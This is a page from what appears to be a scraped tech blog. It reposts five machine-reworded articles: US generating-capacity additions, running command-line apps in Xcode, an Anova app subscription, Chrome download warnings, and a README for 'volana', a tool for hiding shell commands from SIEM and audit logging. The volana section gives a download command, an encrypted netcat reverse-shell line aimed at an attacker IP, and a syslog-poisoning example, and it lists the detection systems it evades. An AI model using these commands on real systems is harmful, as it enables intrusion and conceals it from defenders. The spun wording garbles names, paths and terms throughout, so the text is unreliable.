14.8 C
New York
Monday, March 31, 2025
Home Blog Page 3841

U.S. Energy Grid Added 20.2 GW of Producing Capability in 1st Half of 2024 — Virtually Fully Clear Vitality

codesanitize
-
0
U.S. Energy Grid Added 20.2 GW of Producing Capability in 1st Half of 2024 — Virtually Fully Clear Vitality


Join each day information updates from CleanTechnica on e-mail. Or observe us on Google Information!

In line with our newest Preliminary Month-to-month Electrical Generator Stock, builders and energy plant house owners added 20.2 gigawatts (GW) of utility-scale electrical producing capability in america in the course of the first half of 2024. This new capability is 3.6 GW (21%) greater than the capability added in the course of the first six months of 2023. Based mostly on essentially the most lately reported information, builders and house owners count on so as to add one other 42.6 GW of capability within the second half of the yr.

Knowledge supply: U.S. Vitality Data Administration, Preliminary Month-to-month Electrical Generator Stock, June 2024

Operational capability additions: As in 2023, photo voltaic accounted for the most important share of newly working producing capability in america in the course of the first half of 2024. Photo voltaic additions totaled 12 GW, 59% of all additions. Texas and Florida made up 38% of U.S. photo voltaic additions. The 690-megawatt (MW) photo voltaic and storage Gemini facility in Nevada and the 653-MW Lumina Photo voltaic Challenge in Texas had been the most important photo voltaic tasks that got here on-line within the first six months of 2024.

The second-most capability additions thus far this yr had been battery storage, which made up 21% (4.2 GW). Battery additions had been concentrated in 4 states: California (37% of the U.S. complete), Texas (24%), Arizona (19%), and Nevada (13%). The 380-MW battery storage capability at Gemini and the 300-MW Eleven Mile Photo voltaic Middle in Arizona had been the 2 largest tasks that got here on-line within the first half of 2024.

Wind energy made up 12% (2.5 GW) of U.S. capability additions. Canyon Wind (309 MW) and Goodnight (266 MW), each positioned in Texas, had been the most important wind tasks that got here on-line within the first half of the yr.

Nuclear energy elevated in america throughout 2024 as effectively. Unit 4 (1,114 MW) at Georgia’s Vogtle nuclear energy plant started industrial operations in April, making Vogtle the most important nuclear facility in america and the one one with 4 nuclear energy reactors.

Retired capability: Retirement of U.S. electrical producing capability has slowed in 2024. Operators retired 5.1 GW of producing capability within the first half of the yr. In the course of the first six months of 2023, operators retired 9.2 GW of era. Within the first half of 2024, greater than half (53%) of the retired capability had used pure fuel as its gas, adopted by coal at 41%.

The most important U.S. coal retirements embrace Seminole Electrical Cooperative’s Unit 1 (626.0 MW) in Florida, which retired in January, and Homer Metropolis Producing Station’s Unit 1 (626.1 MW) in Pennsylvania, which retired in April. The six-unit, 1,413-MW Mystic Producing Station combined-cycle facility in Massachusetts was the most important pure fuel retirement this yr and had been the third-largest energy plant in New England.

Knowledge supply: U.S. Vitality Data Administration, Preliminary Month-to-month Electrical Generator Stock, June 2024

Plans for adjustments in capability: Builders plan so as to add 42.6 GW of recent capability in america within the second half of 2024. Almost 60% of that deliberate capability is from photo voltaic (25 GW), adopted by battery storage (10.8 GW) and wind (4.6 GW).

If utilities add all of the photo voltaic capability they’re at present planning, photo voltaic capability additions will complete 37 GW in 2024, a document in anybody yr and virtually double final yr’s 18.8 GW.

Utilities may additionally add a document quantity of battery storage capability this yr (15 GW) if all deliberate additions come on-line. Plans for storage capability in Texas and California at present account for 81% of recent battery storage capability within the second half of the yr.

About 2.4 GW of capability is scheduled to retire in the course of the second half of 2024, together with 0.7 GW of coal and 1.1 GW of pure fuel.

Initially printed on As we speak in Vitality. Principal contributor: Suparna Ray

Have a tip for CleanTechnica? Need to promote? Need to counsel a visitor for our CleanTech Discuss podcast? Contact us right here.

Newest CleanTechnica.TV Movies

Commercial



 

CleanTechnica makes use of affiliate hyperlinks. See our coverage right here.

CleanTechnica’s Remark Coverage



Executing command-line immediately from Xcode — Erica Sadun

codesanitize
-
0
Executing command-line immediately from Xcode — Erica Sadun


I bought pulled into a type of conversations the place I find yourself saying, “Tremendous, I’ll put up a put up about it” and that is the put up. Sure, you can take a look at and run command-line apps immediately from Xcode however I just about by no means do. It’s a ache with few advantages. That stated, right here’s the way you do it.

Arguments

Let’s say you want arguments. Open your scheme (⌘<) and choose the Run > Arguments tab. Add the arguments you need to move on launch separately. Double-click to edit any argument:

The arguments are vended byCommandLine.arguments. Both depend the array or use CommandLine.argc to learn how many arguments you’re coping with.

print(CommandLine.arguments)
print(CommandLine.argc)

Counter-intuitively, Xcode doesn’t robotically quote the arguments for you. This produces 5 arguments, not three, or six in the event you embrace the command itself:

["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "second", "third", "fourth", "fifth"]
6

And what do you anticipate from the next?

You get this in the event you run immediately in Xcode’s console:

["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "several items at once", "third"]
4
Program ended with exit code: 0

However in the event you set your code to execute utilizing Terminal:

Launching: '/Customers/ericasadun/Library/Developer/Xcode/DerivedData/Take a look at-gwehknnihlcsiucsovtbnlrdtfun/Construct/Merchandise/Debug/Take a look at'
Working listing: '/Customers/ericasadun/Library/Developer/Xcode/DerivedData/Take a look at-gwehknnihlcsiucsovtbnlrdtfun/Construct/Merchandise/Debug'
3 arguments:
argv[0] = '/Customers/ericasadun/Library/Developer/Xcode/DerivedData/Take a look at-gwehknnihlcsiucsovtbnlrdtfun/Construct/Merchandise/Debug/Take a look at'
argv[1] = 'first'
argv[2] = 'a number of'
["/Users/ericasadun/Library/Developer/Xcode/DerivedData/Test-gwehknnihlcsiucsovtbnlrdtfun/Build/Products/Debug/Test", "first", "several"]
3

Xcode’s Loopy Terminal Choice

Should you’re working something with direct key enter (utilizing POSIX termios/uncooked mode) or curses, working within the console doesn’t work. So Xcode offers a technique to run these utilities within the terminal. Go to Run > Choices and scroll all the best way down.

This characteristic is buggy as hell, produces ridiculous quantities of extra textual content (see this), can take a major time to launch, and much more time for Xcode to comprehend the method has completed. It’s unimaginable to make use of with paths that use areas (“warning: working listing would not exist: '/Volumes/Kiku/Xcode/Derived'“).

I don’t prefer it. I don’t use it. But it surely exists.

Sane Command-Line Execution

Except you’re coping with issues like automation and such, you’ll be able to check out your compiled command-line apps by dragging your executable from the Merchandise group onto the terminal. This locations the trail to your construct on the immediate. Sort out your arguments and press return:

Nevertheless, I want to make use of a Copy File construct part. Choose your Goal > Construct Phases, click on plus (+) and add the executable. (I take advantage of absolute path and disable “solely when putting in”.) This allows you to set up on to  normal places like /usr/native/bin or ~/bin, or in the event you don’t need to place it there till it’s secure and prepared for deployment, you should use a improvement folder:

Assuming your vacation spot is in your shell’s path, begin a brand new shell for the executable to be picked up the primary time. After that, you’ll be able to compile and run as you want.

Shell Command Obfuscation To Keep away from Detection Methods

codesanitize
-
0
Shell Command Obfuscation To Keep away from Detection Methods




Shell Command Obfuscation To Keep away from Detection Methods


Shell command obfuscation to keep away from SIEM/detection system

Throughout pentest, an vital side is to be stealth. Because of this you must clear your tracks after your passage. Nonetheless, many infrastructures log command and ship them to a SIEM in an actual time making the afterwards cleansing half alone ineffective.

volana present a easy technique to conceal instructions executed on compromised machine by offering it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage

Utilization

It’s essential get an interactive shell. (Discover a technique to spawn it, you’re a hacker, it is your job ! in any other case). Then obtain it heading in the right direction machine and launch it. that is it, now you possibly can sort the command you need to be stealthy executed 

## Obtain it from github launch
## When you shouldn't have web entry from compromised machine, discover one other manner
curl -lO -L https://github.com/ariary/volana/releases/newest/obtain/volana
## Execute it
./volana
## You at the moment are beneath the radar
volana » echo "Hello SIEM workforce! Do you discover me?" > /dev/null 2>&1  #you might be allowed to be a bit cocky
volana » [command]

Key phrase for volana console: * ring: allow ring mode ie every command is launched with lots others to cowl tracks (from answer that monitor system name) * exit: exit volana console

from non interactive shell

Think about you will have a non interactive shell (webshell or blind rce), you possibly can use encrypt and decrypt subcommand. Beforehand, you should construct volana with embedded encryption key.

On attacker machine

## Construct volana with encryption key
make construct.volana-with-encryption
## Switch it on TARGET (the distinctive detectable command)
## [...]
## Encrypt the command you need to stealthy execute
## (Right here a nc bindshell to acquire a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy encrypted command and executed it along with your rce heading in the right direction machine

./volana decr [encrypted_command]
## Now you will have a bindshell, spawn it to make it interactive and use volana normally to be stealth (./volana). + Do not forget to take away volana binary earlier than leaving (trigger decryption key can simply be retrieved from it)

Why not simply conceal command with echo [command] | base64 ? And decode heading in the right direction with echo [encoded_command] | base64 -d | bash

As a result of we need to be protected towards programs that set off alert for base64 use or that search base64 textual content in command. Additionally we need to make investigation troublesome and base64 is not an actual brake.

Detection

Remember the fact that volana isn’t a miracle that can make you completely invisible. Its goal is to make intrusion detection and investigation tougher.

By detected we imply if we’re in a position to set off an alert if a sure command has been executed.

Conceal from

Solely the volana launching command line will likely be catched. 🧠 Nevertheless, by including an area earlier than executing it, the default bash conduct is to not reserve it

  • Detection programs which can be primarily based on historical past command output
  • Detection programs which can be primarily based on historical past information
  • .bash_history, “.zsh_history” and so on ..
  • Detection programs which can be primarily based on bash debug traps
  • Detection programs which can be primarily based on sudo built-in logging system
  • Detection programs tracing all processes syscall system-wide (eg opensnoop)
  • Terminal (tty) recorder (script, display screen -L, sexonthebash, ovh-ttyrec, and so on..)
  • Straightforward to detect & keep away from: pkill -9 script
  • Not a standard case
  • display screen is a little more troublesome to keep away from, nonetheless it doesn’t register enter (secret enter: stty -echo => keep away from)
  • Command detection Could possibly be keep away from with volana with encryption

Seen for

  • Detection programs which have alert for unknown command (volana one)
  • Detection programs which can be primarily based on keylogger
  • Straightforward to keep away from: copy/previous instructions
  • Not a standard case
  • Detection programs which can be primarily based on syslog information (e.g. /var/log/auth.log)
  • Just for sudo or su instructions
  • syslog file could possibly be modified and thus be poisoned as you would like (e.g for /var/log/auth.log:logger -p auth.information "No hacker is poisoning your syslog answer, don't fret")
  • Detection programs which can be primarily based on syscall (eg auditd,LKML/eBPF)
  • Troublesome to research, could possibly be make unreadable by making a number of diversion syscalls
  • Customized LD_PRELOAD injection to make log
  • Not a standard case in any respect

Bug bounty

Sorry for the clickbait title, however no cash will likely be supplied for contibutors. 🐛

Let me know if in case you have discovered: * a technique to detect volana * a technique to spy console that do not detect volana instructions * a technique to keep away from a detection system

Report right here

Credit score



‘Every little thing is a subscription now’ consists of the Anova sous vide

codesanitize
-
0
‘Every little thing is a subscription now’ consists of the Anova sous vide


Anova sous vide cooker shown with companion app

The world simply went somewhat additional down the highway of all the things changing into a subscription, with the information that the companion app for the Anova sous vide cooker will now value $2/month or $10/yr …

Sous vide cooking

For anybody unfamiliar, sous vide is a technique of cooking meals by vacuum sealing it in a plastic bag, after which immersing it in water heated to a really precisely-controlled temperature.

As a result of the meals is totally sealed, all the taste is retained, and the exact temperature management signifies that the cooking methodology delivers extremely constant outcomes.

Anova machine and app

Anova’s sous vide machine includes a programmable heating ingredient, and a companion app. The app lets you discover the proper temperatures and timings for various meals, to manage it remotely, and to obtain updates in your cellphone when the meals is prepared.

Thus far, that’s been free, as you’d anticipate from a companion app there to assist promote {hardware}. However the firm says that from tomorrow, new clients must pay for a month-to-month or annual subscription to make use of it.

The swap to subscription

Right here’s how the corporate defined the transfer:

As our neighborhood has grown, so have the calls for on our sources. Our neighborhood has actually cooked 100s of thousands and thousands of occasions with our app. Sadly, every linked prepare dinner prices us cash. So, to proceed delivering the distinctive service and modern recipes you’ve come to anticipate, we’re introducing a small subscription payment for our app. The brand new Anova Sous Vide Subscription will permit us to keep up and improve the app, guaranteeing it stays a worthwhile useful resource for all of our customers […]

The subscription will value $1.99 per 30 days or $9.99 per yr USD.

The excellent news is that current homeowners don’t should pay, and Anova says it intends (however doesn’t promise) that this may at all times stay the case.

Present clients who’ve an account with us earlier than August twenty first, 2024, is not going to be charged a subscription payment. To be an current consumer, you have to have downloaded our app AND made an account within the app earlier than August twenty first, 2024. Within the occasion you’re an current consumer, you may be grandfathered in to free utilization of the app. You helped us construct Anova and our intent is that you may be grandfathered in perpetually.

9to5Mac’s Take

Whereas I admire the corporate’s place, I can’t assist feeling like it is a damaging transfer. Whereas ten bucks a yr is a small sum within the scheme of issues, it’s taking place inside the context of a rising feeling that we’re hardly allowed to breathe lately with out taking out an oxygen subscription.

I’ve been a cheerful Anova sous vide for a few years now, and have really helpful it to many (it’s a unbelievable technique to prepare dinner superbly tender steaks, for instance, simply browning them in a pan for a couple of seconds afterwards), however I’ll now hesitate to take action.

What’s your take? Please share your ideas within the feedback.

FTC: We use earnings incomes auto affiliate hyperlinks. Extra.

Constructing safety into the redesigned Chrome downloads expertise

codesanitize
-
0
Constructing safety into the redesigned Chrome downloads expertise


Posted by Jasika Bawa, Lily Chen, and Daniel Rubery, Chrome Safety

Final 12 months, we launched a redesign of the Chrome downloads expertise on desktop to make it simpler for customers to work together with current downloads. On the time, we talked about that the extra house and extra versatile UI of the brand new Chrome downloads expertise would give us new alternatives to verify customers keep protected when downloading recordsdata.

Including context and consistency to obtain warnings

The redesigned Chrome downloads expertise provides us the chance to offer much more context when Chrome protects a person from a doubtlessly malicious file. Benefiting from the extra house obtainable within the new downloads UI, we’ve changed our earlier warning messages with extra detailed ones that convey extra nuance concerning the nature of the hazard and can assist customers make extra knowledgeable selections.

Our legacy, space-constrained warning vs. our redesigned one

We additionally made obtain warnings extra comprehensible by introducing a two-tier obtain warning taxonomy based mostly on AI-powered malware verdicts from Google Protected Looking. These are:

  1. Suspicious recordsdata (decrease confidence verdict, unknown threat of person hurt)
  2. Harmful recordsdata (excessive confidence verdict, excessive threat of person hurt)

These two tiers of warnings are distinguished by iconography, colour, and textual content, to make it straightforward for customers to rapidly and confidently make your best option for themselves based mostly on the character of the hazard and Protected Looking’s degree of certainty. General, these enhancements in readability and consistency have resulted in vital modifications in person conduct, together with fewer warnings bypassed, warnings heeded extra rapidly, and all in all, higher safety from malicious downloads.

Differentiation between suspicious and harmful warnings

Defending extra downloads with automated deep scans

Customers who’ve opted-in to the Enhanced Safety mode of Protected Looking in Chrome are prompted to ship the contents of suspicious recordsdata to Protected Looking for deep scanning earlier than opening the file. Suspicious recordsdata are a small fraction of general downloads, and file contents are solely scanned for safety functions and are deleted shortly after a verdict is returned.

We have discovered these further scans to have been terribly profitable – they assist catch model new malware that Protected Looking has not seen earlier than and harmful recordsdata hosted on model new websites. Actually, recordsdata despatched for deep scanning are over 50x extra prone to be flagged as malware than downloads within the combination.

Since Enhanced Safety customers have already agreed to ship a small fraction of their downloads to Protected Looking for safety functions to be able to profit from further protections, we not too long ago moved in the direction of automated deep scans for these customers relatively than prompting every time. This can defend customers from dangerous downloads whereas decreasing person friction.

An automated deep scan leading to a warning

Staying forward of attackers who cover in encrypted archives

Not all deep scans will be carried out mechanically. A present development in cookie theft malware distribution is packaging malicious software program in an encrypted archive – a .zip, .7z, or .rar file, protected by a password – which hides file contents from Protected Looking and different antivirus detection scans. In an effort to fight this evasion method, we’ve launched two safety mechanisms relying on the mode of Protected Looking chosen by the person in Chrome.

Attackers usually make the passwords to encrypted archives obtainable in locations just like the web page from which the file was downloaded, or within the obtain file identify. For Enhanced Safety customers, downloads of suspicious encrypted archives will now immediate the person to enter the file’s password and ship it together with the file to Protected Looking in order that the file will be opened and a deep scan could also be carried out. Uploaded recordsdata and file passwords are deleted a short while after they’re scanned, and all collected information is barely utilized by Protected Looking to offer higher obtain protections.

Enter a file password to ship an encrypted file for a malware scan

For individuals who use Normal Safety mode which is the default in Chrome, we nonetheless needed to have the ability to present some degree of safety. In Normal Safety mode, downloading a suspicious encrypted archive may also set off a immediate to enter the file’s password, however on this case, each the file and the password keep on the native system and solely the metadata of the archive contents are checked with Protected Looking. As such, on this mode, customers are nonetheless protected so long as Protected Looking had beforehand seen and categorized the malware.

The Chrome Safety workforce works intently with Protected Looking, Google’s Risk Evaluation Group, and safety researchers from all over the world to realize insights into the strategies attackers are utilizing. Utilizing these insights, we’re always adapting our product technique to remain forward of attackers and to maintain customers protected whereas downloading recordsdata in Chrome. We look ahead to sharing extra sooner or later!

1...3,8403,8413,842...3,923Page 3,841 of 3,923

ABOUT US

Welcome to CodeSanitize, your number one source for all things coding and technology. We’re dedicated to providing you the very best of software development tutorials, tips, and resources, with a focus on clarity, practical examples, and up-to-date content.

© Copyright 2024 - codesanitize.com. All rights reserved